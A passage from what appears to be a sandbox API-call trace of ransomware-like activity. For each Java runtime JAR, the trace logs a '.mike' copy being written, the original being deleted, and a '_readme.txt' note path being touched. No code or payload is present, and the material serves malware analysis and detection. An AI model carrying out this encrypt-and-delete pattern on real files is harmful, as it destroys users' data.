| out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.mike", lpFilePart=0x0) returned 0x37 [0127.694] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar", lpFilePart=0x0) returned 0x32 [0127.699] WriteFile (in: hFile=0x288, lpBuffer=0x210ce44*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x210ce44*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0127.699] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.mike", lpFilePart=0x0) returned 0x37 [0127.699] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.mike", lpFilePart=0x0) returned 0x37 [0127.699] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar", dwFileAttributes=0x80) returned 1 [0127.700] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar")) returned 1 [0127.701] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.703] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.703] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.mike", lpFilePart=0x0) returned 0x39 [0127.703] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar", lpFilePart=0x0) returned 0x34 [0127.720] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.mike", lpFilePart=0x0) returned 0x39 [0127.720] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.mike", lpFilePart=0x0) returned 0x39 [0127.720] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar", dwFileAttributes=0x80) returned 1 [0127.721] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar")) returned 1 [0127.722] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.724] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.724] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.mike", lpFilePart=0x0) returned 0x3c [0127.724] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar", lpFilePart=0x0) returned 0x37 [0127.832] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.mike", lpFilePart=0x0) returned 0x3c [0127.832] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.mike", lpFilePart=0x0) returned 0x3c [0127.832] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar", dwFileAttributes=0x80) returned 1 [0127.833] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar")) returned 1 [0127.841] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.844] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.844] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.mike", lpFilePart=0x0) returned 0x37 [0127.844] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar", lpFilePart=0x0) returned 0x32 [0127.850] WriteFile (in: hFile=0x288, lpBuffer=0x2281bf8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2281bf8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0127.850] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.mike", lpFilePart=0x0) returned 0x37 [0127.851] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.mike", lpFilePart=0x0) returned 0x37 [0127.851] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar", dwFileAttributes=0x80) returned 1 [0127.851] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar")) returned 1 [0127.852] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.854] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.854] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.mike", lpFilePart=0x0) returned 0x41 [0127.855] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar", lpFilePart=0x0) returned 0x3c [0127.876] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.mike", lpFilePart=0x0) returned 0x41 [0127.876] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.mike", lpFilePart=0x0) returned 0x41 [0127.877] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar", dwFileAttributes=0x80) returned 1 [0127.877] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar")) returned 1 [0127.879] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.881] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.882] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.mike", lpFilePart=0x0) returned 0x3b [0127.882] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar", lpFilePart=0x0) returned 0x36 [0127.887] WriteFile (in: hFile=0x288, lpBuffer=0x21c2a70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21c2a70*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0127.888] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.mike", lpFilePart=0x0) returned 0x3b [0127.888] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.mike", lpFilePart=0x0) returned 0x3b [0127.888] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar", dwFileAttributes=0x80) returned 1 [0127.888] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar")) returned 1 [0127.890] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.892] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.892] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.mike", lpFilePart=0x0) returned 0x3b [0127.892] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar", lpFilePart=0x0) returned 0x36 [0127.913] WriteFile (in: hFile=0x288, lpBuffer=0x22fdd78*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22fdd78*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0127.914] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.mike", lpFilePart=0x0) returned 0x3b [0127.914] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.mike", lpFilePart=0x0) returned 0x3b [0127.914] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar", dwFileAttributes=0x80) returned 1 [0127.915] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar")) returned 1 [0127.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.920] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.920] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.mike", lpFilePart=0x0) returned 0x37 [0127.920] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar", lpFilePart=0x0) returned 0x32 [0127.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.mike", lpFilePart=0x0) returned 0x37 [0127.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.mike", lpFilePart=0x0) returned 0x37 [0127.930] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar", dwFileAttributes=0x80) returned 1 [0127.930] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar")) returned 1 [0127.931] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\_readme.txt", lpFilePart=0x0) returned 0x34 [0127.933] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.933] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.933] CoTaskMemFree (pv=0x508980) [0127.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.933] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts", lpFilePart=0x0) returned 0x2a [0127.938] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.938] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.938] CoTaskMemFree (pv=0x508980) [0127.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.938] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386", lpFilePart=0x0) returned 0x29 [0127.939] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.939] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.939] CoTaskMemFree (pv=0x508980) [0127.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.940] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\images", lpFilePart=0x0) returned 0x2b [0127.940] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.940] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.940] CoTaskMemFree (pv=0x508980) [0127.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.940] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors", lpFilePart=0x0) returned 0x33 [0127.944] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.944] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.944] CoTaskMemFree (pv=0x508980) [0127.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.945] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr", lpFilePart=0x0) returned 0x28 [0127.945] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.945] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.946] CoTaskMemFree (pv=0x508980) [0127.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.946] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\management", lpFilePart=0x0) returned 0x2f [0127.950] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.950] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.950] CoTaskMemFree (pv=0x508980) [0127.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.950] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security", lpFilePart=0x0) returned 0x2d [0127.955] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.955] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.mike", lpFilePart=0x0) returned 0x43 [0127.956] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar", lpFilePart=0x0) returned 0x3e [0127.959] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.mike", lpFilePart=0x0) returned 0x43 [0127.960] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.mike", lpFilePart=0x0) returned 0x43 [0127.960] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar", dwFileAttributes=0x80) returned 1 [0127.960] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar")) returned 1 [0127.961] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\_readme.txt", lpFilePart=0x0) returned 0x39 [0127.963] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0127.963] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.mike", lpFilePart=0x0) returned 0x47 [0127.964] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar", lpFilePart=0x0) returned 0x42 [0127.968] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.mike", lpFilePart=0x0) returned 0x47 [0127.968] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.mike", lpFilePart=0x0) returned 0x47 [0127.968] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar", dwFileAttributes=0x80) returned 1 